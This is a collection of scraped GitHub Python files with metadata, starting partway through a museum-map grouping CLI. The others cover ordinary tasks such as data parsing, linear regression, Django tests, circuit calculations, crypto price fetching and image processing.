\"concepts\"):\n splitting = True\n elif split_by_attribute(dbsession, group, \"subjects\"):\n splitting = True\n elif split_by_attribute(dbsession, group, \"materials\"):\n splitting = True\n elif split_by_attribute(dbsession, group, \"techniques\"):\n splitting = True\n elif split_by_year(config, dbsession, group):\n splitting = True\n else:\n split_by_similarity(dbsession, group)\n splitting = True\n await dbsession.commit()\n progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef split_large_groups(ctx):\n \"\"\"Split large groups into smaller ones.\"\"\"\n asyncio.run(split_large_groups_impl(ctx.obj[\"config\"]))\n\n\nasync def merge_singular_plural_impl(config):\n \"\"\"Merge singular and plural groups.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Merging singular and plural\")\n progress.start()\n modifying = True\n while modifying:\n modifying = False\n stmt = select(Group)\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n stmt = (\n select(Group)\n .filter(and_(Group.value == inflection.singularize(group.value), Group.id != group.id))\n .options(selectinload(Group.items))\n )\n result = await dbsession.execute(stmt)\n other = result.scalars().first()\n if other:\n for item in list(other.items):\n item.group = group\n dbsession.add(item)\n await dbsession.delete(other)\n await dbsession.commit()\n modifying = True\n break\n progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef merge_singular_plural(ctx):\n \"\"\"Merge singular and plural groups.\"\"\"\n asyncio.run(merge_singular_plural_impl(ctx.obj[\"config\"]))\n\n\nasync def add_parent_groups_impl(config):\n \"\"\"Add any required parent groups.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n stmt = select(Group).filter(Group.parent_id is None).options(selectinload(Group.parent))\n result = await dbsession.execute(stmt)\n stmt = select(func.count(Group.id)).filter(Group.parent_id is None)\n result_count = await dbsession.execute(stmt)\n with click.progressbar(\n result.scalars(), length=result_count.scalar_one(), label=\"Adding parent groups\"\n ) as progress:\n for group in progress:\n if \"aat\" in config[\"data\"][\"hierarchy\"][\"expansions\"]:\n categories = apply_aat(group.value, merge=False)\n if categories:\n for category_list in categories:\n mapped = False\n for category in category_list:\n stmt = select(Group).filter(Group.value == category)\n result = await dbsession.execute(stmt)\n parent_group = result.scalars().first()\n if not parent_group:\n parent_group = Group(\n value=category, label=category[0].upper() + category[1:], split=\"parent\"\n )\n dbsession.add(group)\n group.parent = parent_group\n mapped = True\n group = parent_group # noqa: PLW2901\n if group.parent_id:\n break\n if mapped:\n break\n else:\n mapped = False\n for category in apply_nlp(group.value):\n stmt = select(Group).filter(\n or_(Group.value == category, Group.value == inflection.pluralize(category))\n )\n result = await dbsession.execute(stmt)\n parent_group = result.scalars().first()\n if parent_group:\n group.parent = parent_group\n await dbsession.commit()\n mapped = True\n break\n if not mapped:\n if group.value not in [\"styles and periods\"]:\n for category in apply_nlp(group.value):\n hierarchies = apply_aat(category, merge=False)\n groups = []\n for hierarchy in hierarchies:\n if group.value not in hierarchy:\n stmt = (\n select(Group)\n .filter(Group.value.in_(hierarchy))\n .options(selectinload(Group.items))\n )\n result = await dbsession.execute(stmt)\n for potential_group in result.scalars():\n depth = 0\n tmp = potential_group\n while tmp:\n depth = depth + 1\n tmp = tmp.parent\n groups.append((potential_group, depth, len(potential_group.items)))\n if groups:\n groups.sort(key=lambda g: (g[1], g[2]), reverse=True)\n group.parent = groups[0][0]\n break\n await dbsession.commit()\n\n\n@click.command()\n@click.pass_context\ndef add_parent_groups(ctx):\n \"\"\"Add any required parent groups.\"\"\"\n asyncio.run(add_parent_groups_impl(ctx.obj[\"config\"]))\n\n\nasync def prune_single_groups_impl(config):\n \"\"\"Remove groups that have a single child and no items.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Pruning single groups\")\n progress.start()\n pruning = True\n stmt = select(Group).options(selectinload(Group.children), selectinload(Group.items))\n while pruning:\n pruning = False\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n if len(group.items) == 0 and len(group.children) == 1:\n group.children[0].parent = group.parent\n await dbsession.delete(group)\n await dbsession.commit()\n pruning = True\n break\n progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef prune_single_groups(ctx):\n \"\"\"Remove groups that have a single child and no items.\"\"\"\n asyncio.run(prune_single_groups_impl(ctx.obj[\"config\"]))\n\n\nasync def move_inner_items_impl(config):\n \"\"\"Move items from non-leaf groups into extra leaf groups.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Moving inner items\")\n progress.start()\n moving = True\n stmt = select(Group).options(selectinload(Group.children), selectinload(Group.items))\n while moving:\n moving = False\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n if len(group.items) > 0 and len(group.children) > 0:\n sub_group = Group(value=group.value, label=group.label, split=\"inner\")\n dbsession.add(sub_group)\n sub_group.parent = group\n for item in list(group.items):\n item.group = sub_group\n dbsession.add(item)\n await dbsession.commit()\n moving = True\n break\n await dbsession.commit()\n progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef move_inner_items(ctx):\n \"\"\"Move items from non-leaf groups into extra leaf groups.\"\"\"\n asyncio.run(move_inner_items_impl(ctx.obj[\"config\"]))\n\n\nasync def pipeline_impl(config):\n \"\"\"Run the group processing pipeline.\"\"\"\n await generate_groups_impl(config)\n await merge_singular_plural_impl(config)\n await add_parent_groups_impl(config)\n await prune_single_groups_impl(config)\n await move_inner_items_impl(config)\n await split_large_groups_impl(config)\n\n\n@click.command()\n@click.pass_context\ndef pipeline(ctx):\n \"\"\"Run the group processing pipeline.\"\"\"\n asyncio.run(pipeline_impl(ctx.obj[\"config\"]))\n\n\n@click.group()\ndef groups():\n \"\"\"Group generation.\"\"\"\n pass\n\n\ngroups.add_command(generate_groups)\ngroups.add_command(split_large_groups)\ngroups.add_command(add_parent_groups)\ngroups.add_command(merge_singular_plural)\ngroups.add_command(prune_single_groups)\ngroups.add_command(move_inner_items)\ngroups.add_command(pipeline)\n","repo_name":"scmmmh/museum-map","sub_path":"museum_map/cli/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":25774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37333058283","text":"'''\n作者: zhangzongyan\n时间: 18-4-12\n'''\nimport threading\nimport time\n\ndef test():\n while True:\n print(\"hello world\")\n time.sleep(1)\n\nif __name__ == '__main__':\n t = threading.Thread(target=test, args = ())\n t.start() # 新创建的线程如果没有终止,main线程也不会终止\n print(\"main endding\")","repo_name":"zhangzongyan/python20180319","sub_path":"day16/e1.py","file_name":"e1.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38212771675","text":"import json\nimport pandas as pd\nimport glob\n# glob is library that allows us to loop through all the files.\nimport os\n\nif not os.path.exists('parsed_files'):\n\tos.mkdir('parsed_files')\n\t# parsed_files is the folder that will hold the parsed files.\n\ndf = pd.DataFrame()\n# this is how we make a new data frame. need captial letters\n\nfor json_file_name in glob.glob('json_files/*.json'):\n# first glob is the name in the library, and the second i is the function.\n# * is the wild card. it means we want allll things that end in .json.\n\tf = open(json_file_name, \"r\")\n\tjson_data = json.load(f)\n\n# df = df.append({'adult': json_data['adult'], 'backdrop_path': json_data['backdrop_path'], 'title': json_data['title']}, ignore_index=True)\n# append allows us to put things at the end of the data frame.. so we can append the data from this movie into the dataframe.\n# this creates categories for 'adult' etc.\n# typing all of this is time consuming.\n\n\tdf = df.append({\n\t\t\t'adult': json_data['adult'],\n\t\t\t'backdrop_path': json_data['backdrop_path'],\n\t\t\t'belongs_to_collection': json_data['belongs_to_collection'],\n\t\t\t'budget': json_data['budget'],\n\t\t\t'genres': json_data['genres'],\n\t\t\t'homepage': json_data['homepage'],\n\t\t\t'id': json_data['id'],\n\t\t\t'imdb_id': json_data['imdb_id'],\n\t\t\t'original_language': json_data['original_language'],\n\t\t\t'original_title': json_data['original_title'],\n\t\t\t'overview': json_data['overview'],\n\t\t\t'popularity': json_data['popularity'],\n\t\t\t'poster_path': json_data['poster_path'],\n\t\t\t'production_companies': json_data['production_companies'],\n\t\t\t'production_countries': json_data['production_countries'],\n\t\t\t'release_date': json_data['release_date'],\n\t\t\t'revenue': json_data['revenue'],\n\t\t\t'runtime': json_data['runtime'],\n\t\t\t'spoken_languages': json_data['spoken_languages'],\n\t\t\t'status': json_data['status'],\n\t\t\t'tagline': json_data['tagline'],\n\t\t\t'title': json_data['title'],\n\t\t\t'video': json_data['video'],\n\t\t\t'vote_average': json_data['vote_average'],\n\t\t\t'vote_count': json_data['vote_count']\n\t\t}, ignore_index=True)\n\nprint(df)\n\ndf.to_csv('parsed_files/tmdb_dataset.csv')","repo_name":"cbouts/tmdb_download","sub_path":"tmdb_parse.py","file_name":"tmdb_parse.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7049775280","text":"from sklearn import datasets\nimport numpy as np\nfrom numpy import ndarray\nimport matplotlib.pyplot as plt\nfrom random import randint\nimport mpl_toolkits.mplot3d as plt3d\n\ndef linear_regression(x: ndarray, y: ndarray, theta: ndarray) -> None:\n \"\"\"Given a test set X with labels Y, return the linear regression for the data set\n with the minimum cost.\"\"\"\n print(cost_function(x, y, theta))\n gradient_descent(x, y, theta, 0.01, 10000)\n print(cost_function(x, y, theta))\n\ndef cost_function(x: ndarray, y: ndarray, theta: ndarray) -> float:\n return np.sum(np.square((np.matmul(x, theta)-y)))/(2*x.shape[0])\n\ndef gradient_descent(x: ndarray, y: ndarray, theta: ndarray, alpha: float, turns: int) -> None:\n while turns > 0:\n temp = np.zeros([x.shape[1], 1])\n for i in range(x.shape[1]):\n temp[i] = theta[i] - alpha*np.sum(np.matmul(x, theta)-y)/(x.shape[0])\n theta[i] = temp[i]\n\n turns -= 1\n\ndef plotData(x: ndarray, y: ndarray, theta: ndarray):\n plt.plot(x, y, 'bo', x, eval('x*%f+%f' % (theta[1], theta[0])))\n plt.show()\n\nif __name__ == \"__main__\":\n boston = datasets.load_boston()\n\n # 2-D data\n X = boston.data[:, 5:6]\n Y = boston.target\n\n plt.plot(X, Y, 'bo')\n plt.xlabel('Number of Rooms')\n plt.ylabel('Price ($1000s)')\n plt.show()\n\n theta = np.array([1, X[randint(0, X.shape[0])]])\n X = np.append(np.ones(X.shape), X, axis=1)\n\n linear_regression(X, Y, theta)\n\n plt.plot(X, Y, 'bo')\n plt.xlabel('Number of Rooms')\n plt.ylabel('Price ($1000s)')\n plt.plot(X[:, 1], eval('X*%d+%d' % (theta[1], theta[0])))\n plt.show()\n\n #3-D data\n X = boston.data[:, 4:6]\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X[:, 0], X[:, 1], Y)\n ax.set_xlabel('NO2 concentration (parts per 10 million)')\n ax.set_ylabel('Number of rooms')\n ax.set_zlabel('Price ($1000s)')\n\n plt.show()\n\n rand = randint(0, X.shape[0])\n theta = np.array([1, X[rand, 0], X[rand, 1]])\n X = np.append(np.ones(X.shape[0]).reshape([X.shape[0], 1]), X, axis=1)\n\n linear_regression(X, Y, theta)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X[:, 1], X[:, 2], Y)\n ax.set_xlabel('NO2 concentration (parts per 10 million)')\n ax.set_ylabel('Number of rooms')\n ax.set_zlabel('Price ($1000s)')\n\n theta_points = np.array((eval('%f + %f*X[:, 1] + %f*X[:, 2]' % (theta[0], theta[1], theta[2]))))\n #ax.scatter(X[:, 1], X[:, 2], theta_points)\n\n #r1 = randint(0, X.shape[0])\n #r2 = randint(0, X.shape[0])\n #r3 = randint(0, X.shape[0])\n\n #p1 = np.array([X[r1][1], X[r1][2], theta_points[r1]])\n #p2 = np.array([X[r2][1], X[r2][2], theta_points[r2]])\n #p3 = np.array([X[r3][1], X[r3][2], theta_points[r3]])\n\n #v1 = p2-p1\n #v2 = p3-p1\n\n #normal = np.cross(v1, v2)\n #d = -np.dot(normal, p1)\n #Z = (-normal[0]*X[:, 1]-normal[1]*X[:, 2]-d)/normal[2]\n\n ax.plot_trisurf(X[:, 1], X[:, 2], theta_points, color='orange')\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"joshhan619/linear_regression_example","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"758556674","text":"tab_a = [3, 3, 3, 9, 9, 9, 1, 1, 1, 7, 2, 2, 2, 4, 4, 4, 8, 8, 8, 5, 5, 5]\r\n\r\ntab_b = [8, 5, 5, 5, 9, 9, 9, 18, 18, 18, 3, 3, 3]\r\n\r\ntab_c = [5, 5, 5, 1, 1, 1, 0, 0, 0, 6, 6, 6, 3, 8, 8, 8]\r\n\r\ndef trouver_intrus(tab, g, d):\r\n '''\r\n Renvoie la valeur de l'intrus situe entre les indices g et d\r\n dans la liste tab ou :\r\n tab verifie les conditions de l'exercice,\r\n g et d sont des multiples de 3.\r\n '''\r\n if g == d:\r\n return ...\r\n\r\n else:\r\n nombre_de_triplets = (d - g)// ...\r\n indice = g + 3 * (nombre_de_triplets // 2)\r\n if ... :\r\n return ...\r\n else:\r\n return ...\r\n","repo_name":"glassus/terminale_nsi","sub_path":"docs/T6_6_Epreuve_pratique/data2023/scripts/23-NSI-23.py","file_name":"23-NSI-23.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"fr","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"31860046251","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom django.shortcuts import resolve_url\nfrom .models import Reminder\n\n\nclass DeleteItemTest(TestCase):\n def test_delete_item(self):\n Reminder.objects.create(title=\"Test\", description=\"test\")\n url = \"/reminders/1/delete\"\n response = self.client.delete(f\"{url}\")\n print(response.content)\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.content, b'{\"message\": \"Successfully deleted\"}')\n\n\nclass MathTest(TestCase):\n def test_addition_operation(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=add&a=1&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"3\")\n\n def test_subtraction_operation(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=sub&a=1&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"-1\")\n\n def test_multi_operation(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=mul&a=3&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"6\")\n\n def test_div_operation1(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=div&a=6&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"3\")\n\n def test_div_operation2(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=div&a=6&b=0\")\n self.assertEqual(response.status_code, 500)\n self.assertEqual(response.content, b'{\"result\": \"ERROR!\"}')\n","repo_name":"peerhoffmanncode/Coding-DCI","sub_path":"Assigments/00_Assesment/database-basic-usage-coding-test-1-peerhoffmanncode/assignment/reminders/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40488299257","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef calcParam(Ra,Rb,Rc,VoReg,Vcc):\n IoCC = 0.7*(Rb+Rc)/(Ra*Rc)\n IoMAX = (VoReg*Rb+0.7*(Rb+Rc))/(Ra*Rc) \n PdMIN = (Vcc*Rb+0.7*(Rb+Rc))**2/(4*Ra*Rb*Rc)\n return IoCC,IoMAX,PdMIN \n\ndef calcVo(Io,Ra,Rb,Rc):\n return ((Io*Ra-0.7)*((Rb+Rc)/Rb)-Io*Ra)\n\ndef graphRsweep(Ra,Rb,Rc,VoReg,Vcc):\n Iocc,IoMAX,P = calcParam(Ra,Rb,Rc,VoReg,Vcc)\n I = np.arange(Iocc,IoMAX,(IoMAX-Iocc)/100)\n I = np.append(I,IoMAX)\n V = []\n for i in range(0,len(I)):\n Vaux = calcVo(I[i],Ra,Rb,Rc)\n V.append(Vaux)\n Ireg = np.arange(0,IoMAX,(IoMAX)/100)\n Ireg = np.append(Ireg,IoMAX)\n Vreg = []\n for i in range(0,len(Ireg)):\n Vreg.append(VoReg)\n plt.plot(I,V,'b')\n plt.plot(Ireg,Vreg,'b')\n plt.plot([IoMAX], [VoReg], 'ro',label = \"Rmin: %0.2f ohms\" % (VoReg/IoMAX))\n plt.plot([0.7], [VoReg], 'g^',label = \"R: %0.2f ohms\" % (VoReg/0.7))\n IpMAX = Vcc*(Rb/(2*Ra*Rc))+0.35*((Rb+Rc)/(Ra*Rc))\n VpMAX = 0.5*(Vcc-0.7*((Rb+Rc)/Rb))\n plt.plot([IpMAX], [VpMAX], 'bs', label = \"RMaxPd: %0.2f ohms\" % (VpMAX/IpMAX))\n plt.legend()\n\ndef graphPdRl(Ri,Rf,Ra,Rb,Rc,Vcc,VoReg):\n IoCC, IoMAX, P = calcParam(Ra,Rb,Rc,VoReg,Vcc)\n Rload = np.arange(Ri,Rf,(Rf-Ri)/100)\n Po = []\n for i in range(0,len(Rload)):\n if Rload[i] < VoReg/(IoMAX):\n PoAux = Rload[i]*((0.7*(Rb+Rc))/(Ra*Rc-Rb*Rload[i]))**2\n Po.append(PoAux)\n else:\n PoAux = VoReg**2/Rload[i]\n Po.append(PoAux)\n plt.plot(Rload,Po,'g')\n\ndef graphPdT2(Ri,Rf,Ra,Rb,Rc,Vcc,VoReg):\n IoCC, IoMAX, PT2MAX = calcParam(Ra,Rb,Rc,VoReg,Vcc)\n Rload = np.arange(Ri,Rf,(Rf-Ri)/100)\n PT2 = []\n for i in range(0,len(Rload)):\n if Rload[i] < VoReg/(IoMAX):\n PT2aux = (Vcc-0.7*Rload[i]*((Rb+Rc)/(Ra*Rc-Rload[i]*Rb)))*0.7*(Rb+Rc)/(Ra*Rc-Rload[i]*Rb)\n PT2.append(PT2aux)\n else:\n PT2aux = (Vcc-VoReg)*(VoReg/Rload[i])\n PT2.append(PT2aux)\n\n plt.plot(Rload,PT2,'r')\n plt.plot([VoReg/IoMAX], [(Vcc-VoReg)*(IoMAX)], 'bo',label = \"(%0.2f ohms,%0.2f Watts)\" % (VoReg/IoMAX,(Vcc-VoReg)*(IoMAX)))\n plt.plot([Rload[np.argmax(PT2)]], [PT2MAX], 'g^',label = \"(%0.2f ohms,%0.2f Watts)\" % (Rload[np.argmax(PT2)],PT2MAX))\n plt.legend()\n\ndef sensibilidades(Ra,Rb,Rc,Vcc,VoReg): #cada arreglo tiene sensiblidades en orden [Ra,Rb,Rc]\n sensPd = []\n sensIocc = []\n sensIoMAX = []\n sensPd.append(-1)\n sensPd.append(((100*Vcc**2+140*Vcc+49)*Rb**2-49*Rc**2)/(10*Vcc*Rb+7*(Rb+Rc))**2)\n sensPd.append((7*Rc-10*Rb*Vcc-7*Rb)*(7*Rc+10*Rb*Vcc+7*Rb)/(10*Vcc*Rb+7*(Rb+Rc))**2)\n sensIocc.append(-1)\n sensIocc.append(Rb/(Rb+Rc))\n sensIocc.append(-Rb/(Rb+Rc))\n sensIoMAX.append(-1)\n sensIoMAX.append(Rb*(VoReg+0.7)/(Rb*(VoReg+0.7)+Rc*0.7))\n sensIoMAX.append(-Rb*(VoReg+0.7)/(Rb*(VoReg+0.7)+Rc*0.7))\n return sensPd,sensIocc,sensIoMAX\n\n\n\ndef resistorValues(VoReg,Vcc,ImaxProt):\n Ra = []\n Rb = []\n Rc = []\n RaArray = np.arange(0.5,1.05,0.05)\n RbArray = np.arange(200,2000,10)\n for i in range(0,len(RaArray)):\n if RaArray[i]>0.7/ImaxProt:\n for j in range(0,len(RbArray)):\n RcAux = RbArray[j]*((VoReg+0.7)/(ImaxProt*RaArray[i]-0.7))\n Iocc,IoMAX,PT2 = calcParam(RaArray[i],RbArray[j],RcAux,VoReg,Vcc) \n if (PT2<20) and (RbArray[j]+RcAux)>1000 and (RbArray[j]+RcAux)<10000 and RbArray[j]>600:\n Ra.append(RaArray[i])\n Rb.append(RbArray[j])\n Rc.append(RcAux)\n return Ra,Rb,Rc\n\ndef main():\n VoReg = 9\n Vcc = 15\n Ra,Rb,Rc = resistorValues(VoReg,Vcc,1.4)\n for i in range(0,len(Ra)):\n print('Combinacion %s' % (i))\n print(' Ra: %s ohms' % (Ra[i]))\n print(' Rb: %s ohms' % (Rb[i]))\n print(' Rc: %s ohms' % (Rc[i]))\n IoCC,IoMAX,PT2MAX = calcParam(Ra[i],Rb[i],Rc[i],VoReg,Vcc)\n print(' Iocc: %s A' % (IoCC))\n print(' IoMAX: %s A' % (IoMAX))\n print(' Potencia maxima en T2: %s W' % (PT2MAX))\n print(' Potencia en Ra: %s W' % (IoMAX**2*Ra[i]))\n sensPd,sensIocc,sensIoMAX = sensibilidades(Ra[i],Rb[i],Rc[i],Vcc,VoReg)\n print(' Sensibilidad de Ra en Pd: %s' % (sensPd[0]))\n print(' Sensibilidad de Rb en Pd: %s' % (sensPd[1]))\n print(' Sensibilidad de Rc en Pd: %s' % (sensPd[2]))\n print(' Sensibilidad de Ra en Iocc: %s' % (sensIocc[0]))\n print(' Sensibilidad de Rb en Iocc: %s' % (sensIocc[1]))\n print(' Sensibilidad de Rc en Iocc: %s' % (sensIocc[2]))\n print(' Sensibilidad de Ra en IoMAX: %s' % (sensIoMAX[0]))\n print(' Sensibilidad de Rb en IoMAX: %s' % (sensIoMAX[1]))\n print(' Sensibilidad de Rc en IoMAX: %s' % (sensIoMAX[2]))\n plt.figure('Vo(Io) Combinacion nro %s' % (i))\n graphRsweep(Ra[i],Rb[i],Rc[i],VoReg,Vcc)\n plt.yticks(np.arange(0,np.ceil(VoReg)+1,1))\n plt.grid(True,'both','both')\n plt.xlabel('Io [A]')\n plt.ylabel('Vo [V]')\n plt.figure('Pt2(Rload) Combinacion nro %s' % (i))\n graphPdT2(0,10,Ra[i],Rb[i],Rc[i],Vcc,VoReg)\n plt.xticks(np.arange(0,11,1))\n plt.grid(True,'both','both')\n plt.xlabel('Rload [ohms]')\n plt.ylabel('Pt2 [W]')\n plt.figure('Po(Rload) Combinacion nro %s' % (i))\n graphPdRl(0,10,Ra[i],Rb[i],Rc[i],Vcc,VoReg)\n plt.xticks(np.arange(0,11,1))\n plt.grid(True,'both','both')\n plt.xlabel('Rload [ohms]')\n plt.ylabel('Po [W]')\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"mlarroque/electro2-TP1","sub_path":"foldbackValuesCalculator/foldbackValuesCalculator/foldbackValuesCalculator.py","file_name":"foldbackValuesCalculator.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26279485064","text":"from pycoingecko import CoinGeckoAPI\nfrom telegram import tel_send_message\nfrom pprint import pprint\n\ncg = CoinGeckoAPI()\n\n\ndef get_prices(coin_ids: str, vs_currencies: str):\n prices = cg.get_price(\n ids=coin_ids,\n vs_currencies=vs_currencies\n )\n\n text = ''\n for k, v in prices.items():\n price = v.get('usd')\n text += f'Symbol: {k} - Price(usd): {price}'\n text += f'\\n'\n\n tel_send_message(text)\n return prices\n\n\ndef get_coin_list():\n return cg.get_coins_list()\n\n\ndef get_coins_markets(vs_currency: str):\n return cg.get_coins_markets(vs_currency)\n\n\ndef get_coin_by_id(id: str):\n return cg.get_coin_by_id(id)\n\ndef get_coin_ohlc_by_id(id: str, vs_curreny: str, days:str):\n \"\"\"\n Example response:\n \t\n successful operation\n\n [\n 1594382400000 (time),\n 1.1 (open),\n 2.2 (high),\n 3.3 (low),\n 4.4 (close)\n ]\n \"\"\"\n return cg.get_coin_ohlc_by_id(id, vs_curreny, days)\n\n\ndef get_global_data(descentralized=False):\n\n if descentralized:\n return cg.get_global_decentralized_finance_defi()\n \n return cg.get_global()\n\nif __name__ == '__main__':\n\n # Agrega todas las llamadas que consideres necesarias.\n get_prices('bitcoin,ethereum', 'usd')\n\n # print(get_coin_list())\n #pprint(get_coins_markets('usd'))\n pprint(get_coin_by_id('bitcoin'))\n\n # Global data\n print('##########################')\n print('No DeFi Data:')\n pprint(get_global_data())\n\n print('##########################')\n print('DeFi Data')\n pprint(get_global_data(True))\n\n pprint(get_coin_ohlc_by_id('bitcoin', 'usd', '1'))","repo_name":"rmblockcode/coingecko-tutorial","sub_path":"coingecko.py","file_name":"coingecko.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41334893213","text":"#! /usr/bin/python3\nimport svar\nimport json\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-task\",default=\"./data/sample/task.json\",help=\"The input task json file\")\nparser.add_argument(\"-out\",default='dom.tif',help=\"The output ortho mosaic image file\")\nparser.add_argument(\"-arg\", nargs='+', action='append',default=[],help=\"the processing parameters\")\nparser.add_argument(\"-with_pose\", action=\"store_true\", help=\"Use pose stitching instead of reconstruct\")\n \nargs = parser.parse_args()\n\nsibitu=svar.load('svar_highstitch')\n\ntask=json.loads(open(args.task).read())\n\nfor it_args in args.arg:\n for arg in it_args:\n key,value= arg.split('=')\n task[\"parameters\"][key]=value\n\ntask[\"parameters\"][\"topdir\"]= os.path.dirname(args.task)\n\nos.system('rm area.txt *.tile -f')\n\nif args.with_pose:\n success=sibitu.stitch_with_pose(task,args.out)\nelse:\n success=sibitu.stitch_task(task,args.out)\nos.system('rm area.txt *.tile -f')\n\n\n","repo_name":"zdzhaoyong/highstitch","sub_path":"python/5_highstitch.py","file_name":"5_highstitch.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"29549790859","text":"import cv2 \nimport numpy as np\ncap = cv2.VideoCapture(0)\nret, img2 = cap.read()\nwhile(True):\n\n\tret, img = cap.read()\n\tkernal=np.ones((2,2),np.uint8)\n\timg1= cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\timg1 = cv2.GaussianBlur(img1,(5,5),0) \n\timg = cv2.rectangle(img, (200,80), (400,180), (255,0,0), 2)\n\t\n\timg2= cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\timg2 = cv2.GaussianBlur(img2,(5,5),0) \n\tcanny1=cv2.Canny(img1, 40, 50)\n\tcanny2=cv2.Canny(img2, 40, 50)\n\tcanny = cv2.bitwise_and(canny1, canny2)\n\tcan = cv2.getRectSubPix(canny1, (400,180), (200,80))\n\t#canny1 = cv2.bitwise_not(canny1)\n\tcanny1=cv2.line(canny1, (200,200), (310,200), (255,255,255), 1)\n\tcanny1=cv2.line(canny1, (200,235), (310,235), (255,255,255), 1)\n\tdont, contours, hierarchy = cv2.findContours(canny1, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\tcontours = filter(lambda x: cv2.contourArea(x)>500 , contours)\n\tcanny1= cv2.cvtColor(canny1, cv2.COLOR_GRAY2BGR)\n\tcv2.drawContours(canny1, contours, -1, (0, 255, 0), 1) \n\t#canny= cv2.dilate(canny, kernal, iterations=1)\n\t#img2= cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\t#diff=cv2.absdiff(img, img2)\n\t#diff= cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\t#_,diff1= cv2.threshold(diff, 100,255, cv2.THRESH_BINARY)\n\tcv2.imshow(\"diff\", canny1)\n\t#cv2.imshow(\"diffi\", can)\n\t#cv2.imshow(\"diff1\", diff1)\n\tcv2.imshow(\"img\", img)\n\n#\t_,ig= cv2.threshold(img, 75,255, cv2.THRESH_TRIANGLE)\n\t_,im= cv2.threshold(img1, 100,255, cv2.THRESH_BINARY)\n\t#cv2.imshow('im', im)\n\tcv2.imshow('ig', img1)\n\tkey = cv2.waitKey(5) \n\tif key==ord('q'): #press \"q\" key on keyboard to stop videocapture\n\t\tbreak\n\tret, img2 = cap.read()\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"shreysingla11/ITSP","sub_path":"eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31452739898","text":"from PIL import Image\nimport numpy as np \n\nim = Image.open('./lena.bmp')\nr, c = im.size\n\nerosion = np.zeros((r,c), dtype = np.int32)\nimg = np.asarray(im)\n\n\nkernel=np.array([[0,1,1,1,0],\n [1,1,1,1,1],\n [1,1,1,1,1],\n [1,1,1,1,1],\n [0,1,1,1,0]])\n\n\n\"\"\"Gray Scale Erosion: Minimum\"\"\"\nfor i in range(r):\n\tfor j in range(c):\n\t\ttmp = img[i][j]\n\t\tfor x in range(-2,3):\n\t\t\tif i+x < 0 or i+x >= 512:\n\t\t\t\tbreak\n\t\t\tfor y in range(-2,3):\n\t\t\t\tif j+y < 0 or j+y >= 512:\n\t\t\t\t\tbreak\n\t\t\t\tif kernel[x+2][y+2] == 1:\n\t\t\t\t\ttmp = min(tmp,img[i+x][y+j])\n\n\t\terosion[i][j] = tmp\n\nim = Image.fromarray(erosion)\nim = im.convert(\"L\")\nim.save('lena_gray_scale_erosion.bmp', format = 'BMP')\n\n\n\n\n","repo_name":"archielu/computer_vision_2021_fall","sub_path":"hw5/src/hw5b.py","file_name":"hw5b.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 